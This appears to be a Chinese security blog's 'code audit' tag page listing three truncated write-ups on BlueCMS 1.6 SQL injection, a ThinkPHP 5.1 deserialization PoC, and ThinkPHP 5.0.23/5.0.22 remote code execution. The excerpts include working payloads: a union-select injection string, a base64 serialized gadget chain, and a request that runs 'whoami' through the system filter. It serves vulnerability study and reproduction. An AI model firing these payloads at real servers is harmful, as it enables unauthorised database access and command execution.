标签:代码审计

3 篇文章

bluecms1.6审计
ad_js sql注入数字型注入1%20union%20select%201,2,3,4,5,6,(select%20user())common.inc.php sql注入此文件在include下,应该是一些基础的函数或配置,所以任何包含此文件的都可以进行注入emmm找到publish.php,正好包含了该文件common.inc.php注入点:i…
thinkphp v5.1反序列化链poc
反序列化复现首先修改一下index.php,加一个反序列化的代码:payload:TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1…
thinkphp5.0.23-RCE分析
漏洞复现payload:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami这个是5.0.23的,再给一个5.0.22的payload:index.php?s=index/think\app/invokefunction&am…